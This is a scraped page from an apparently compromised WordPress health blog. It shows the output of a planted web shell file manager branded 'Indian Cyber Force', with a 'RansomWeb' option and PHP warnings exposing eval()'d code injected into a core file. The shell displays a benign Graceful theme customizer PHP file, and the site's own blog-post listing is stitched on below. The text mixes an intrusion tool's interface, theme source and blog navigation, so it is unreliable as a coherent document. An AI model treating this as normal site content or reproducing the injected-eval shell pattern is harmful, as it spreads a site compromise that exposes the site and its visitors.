Warning: Constant WP_USE_THEMES already defined in css.zip#index.php on line 74
  • Home (current)
  • वर्तमान निदेशक => /www/wwwroot/wellwisehub.org/wp-content/themes/graceful/inc/customizer/theme-options/
  • सूचना एवं अपलोड
    Info Server
Indian Cyber Force
Folders रचयन्तु सञ्चिकां रचयन्तु RansomWeb लॉगआउट

Warning: Undefined array key "बहिः गच्छतु" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 136

Warning: Undefined array key "aksi" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 140

Warning: Undefined array key "नामपत्र" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 159

Warning: Undefined array key "नामपत्र" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 181
Current File : /www/wwwroot/wellwisehub.org/wp-content/themes/graceful/inc/customizer/theme-options/blogs-page.php
<?php
/**
 * Customizer Blogs Page Section
 *
 * @package Graceful
 */

/*
** Blogs Page =====
*/

	$wp_customize->add_section( 'graceful_post_page' , array(
		'title'		 => esc_html__( 'Blog List Page', 'graceful' ),
		'priority'	 => 29,
		'capability' => 'edit_theme_options'
	) );

	$post_description = array(
		'none' 		=> esc_html__( 'None', 'graceful' ),
		'excerpt' 	=> esc_html__( 'Post Excerpt', 'graceful' ),
		'content' 	=> esc_html__( 'Post Content', 'graceful' ),
	);

	// Post Description
	$wp_customize->add_setting( 'graceful_options[post_page_post_description]', array(
		'default'	 => graceful_options( 'post_page_post_description' ),
		'type'		 => 'option',
		'transport'	 => 'refresh',
		'capability' => 'edit_theme_options',
		'sanitize_callback' => 'graceful_sanitize_select'
	) );
	$wp_customize->add_control( 'graceful_options[post_page_post_description]', array(
		'label'			=> esc_html__( 'Post Description', 'graceful' ),
		'section'		=> 'graceful_post_page',
		'type'			=> 'select',
		'choices' 		=> $post_description,
		'priority'		=> 3
	) );

	$site_pagination = array(
		'default' 	=> esc_html__( 'Default', 'graceful' ),
		'numeric' 	=> esc_html__( 'Numeric', 'graceful' ),
	);

	// Site Pagination
	$wp_customize->add_setting( 'graceful_options[post_page_site_pagination]', array(
		'default'	 => graceful_options( 'post_page_site_pagination' ),
		'type'		 => 'option',
		'transport'	 => 'refresh',
		'capability' => 'edit_theme_options',
		'sanitize_callback' => 'graceful_sanitize_select'
	) );
	$wp_customize->add_control( 'graceful_options[post_page_site_pagination]', array(
		'label'			=> esc_html__( 'Site Pagination', 'graceful' ),
		'section'		=> 'graceful_post_page',
		'type'			=> 'select',
		'choices' 		=> $site_pagination,
		'priority'		=> 5
	) );

	// Show Categories
	$wp_customize->add_setting( 'graceful_options[post_page_show_categories]', array(
		'default'	 => graceful_options('post_page_show_categories'),
		'type'		 => 'option',
		'transport'	 => 'refresh',
		'capability' => 'edit_theme_options',
		'sanitize_callback' => 'graceful_sanitize_checkboxes'
	) );
	$wp_customize->add_control( 'graceful_options[post_page_show_categories]', array(
		'label'		=> esc_html__( 'Show Categories', 'graceful' ),
		'section'	=> 'graceful_post_page',
		'type'		=> 'checkbox',
		'priority'	=> 6
	) );


	// Show Date
	$wp_customize->add_setting( 'graceful_options[post_page_show_date]', array(
		'default'	 => graceful_options('post_page_show_date'),
		'type'		 => 'option',
		'transport'	 => 'refresh',
		'capability' => 'edit_theme_options',
		'sanitize_callback' => 'graceful_sanitize_checkboxes'
	) );
	$wp_customize->add_control( 'graceful_options[post_page_show_date]', array(
		'label'		=> esc_html__( 'Show Date', 'graceful' ),
		'section'	=> 'graceful_post_page',
		'type'		=> 'checkbox',
		'priority'	=> 7
	) );

	// Show Comments
	$wp_customize->add_setting( 'graceful_options[post_page_show_comments]', array(
		'default'	 => graceful_options('post_page_show_comments'),
		'type'		 => 'option',
		'transport'	 => 'refresh',
		'capability' => 'edit_theme_options',
		'sanitize_callback' => 'graceful_sanitize_checkboxes'
	) );
	$wp_customize->add_control( 'graceful_options[post_page_show_comments]', array(
		'label'		=> esc_html__( 'Show Comments', 'graceful' ),
		'section'	=> 'graceful_post_page',
		'type'		=> 'checkbox',
		'priority'	=> 9
	) );

	// Show Drop Caps
	$wp_customize->add_setting( 'graceful_options[post_page_show_dropcaps]', array(
		'default'	 => graceful_options('post_page_show_dropcaps'),
		'type'		 => 'option',
		'transport'	 => 'refresh',
		'capability' => 'edit_theme_options',
		'sanitize_callback' => 'graceful_sanitize_checkboxes'
	) );
	$wp_customize->add_control( 'graceful_options[post_page_show_dropcaps]', array(
		'label'		=> esc_html__( 'Show Drop Caps', 'graceful' ),
		'section'	=> 'graceful_post_page',
		'type'		=> 'checkbox',
		'priority'	=> 11
	) );

	// Show Author
	$wp_customize->add_setting( 'graceful_options[post_page_show_author]', array(
		'default'	 => graceful_options('post_page_show_author'),
		'type'		 => 'option',
		'transport'	 => 'refresh',
		'capability' => 'edit_theme_options',
		'sanitize_callback' => 'graceful_sanitize_checkboxes'
	) );
	$wp_customize->add_control( 'graceful_options[post_page_show_author]', array(
		'label'		=> esc_html__( 'Show Author', 'graceful' ),
		'section'	=> 'graceful_post_page',
		'type'		=> 'checkbox',
		'priority'	=> 16
	) );

	$related_posts = array(
		'none' 		=> esc_html__( 'None', 'graceful' ),
		'related' 	=> esc_html__( 'Related', 'graceful' )
	);

	// Related Posts Orderby
	$wp_customize->add_setting( 'graceful_options[post_page_related_orderby]', array(
		'default'	 => graceful_options( 'post_page_related_orderby' ),
		'type'		 => 'option',
		'transport'	 => 'refresh',
		'capability' => 'edit_theme_options',
		'sanitize_callback' => 'graceful_sanitize_select'
	) );
	$wp_customize->add_control( 'graceful_options[post_page_related_orderby]', array(
		'label'			=> esc_html__( 'Related Posts Display', 'graceful' ),
		'section'		=> 'graceful_post_page',
		'type'			=> 'select',
		'choices' 		=> $related_posts,
		'priority'		=> 33
	) );

	// Pro Version
	$wp_customize->add_setting( 'pro_version_post_page', array(
		'sanitize_callback' => 'graceful_sanitize_custom_controller'
	) );
	$wp_customize->add_control( new Graceful_Pro ( $wp_customize,
			'pro_version_post_page', array(
				'section'	  => 'graceful_post_page',
				'type'		  => 'pro_options',
				'label' 	  => esc_html__( 'Blog Options ', 'graceful' ),
				'description' => esc_html( 'optimathemes.com/themes/graceful-pro?ref=graceful-post-page-customizer' ),
				'priority'	  => 100
			)
		)
	);
wellwisehub – Page 2 Skip to content
wellwisehub

Latest Articles

  • Blog

    Essential Fitness Gear for a More Productive Workout

  • Blog

    Understanding Drug Test Kits: The Chemistry of Substance Detection

  • Blog

    “Transform Your Look: 5 Ways to Enhance Your Facial Appearance”

  • Blog

    Innovative Approaches and Medications for Ulcer Treatment

  • Blog

    The Advantages and Comforts of Hospice Care

  • Blog

    5 Indicators That Your Facial Skin Could Benefit from Expert Care

  • Blog

    Is It Safe to Remove Surgical Staples at Home?

  • Blog

    The Role of Support Groups in Addiction Recovery

  • Blog

    The Best Way to Arrange Your Skincare Routine for Maximum Effectiveness

  • Blog

    Key Factors to Consider When Choosing a Reliable Drug Rehab Center

 Older Posts
Newer Posts 

Recent Posts

Recent Comments

Graceful Theme by Optima Themes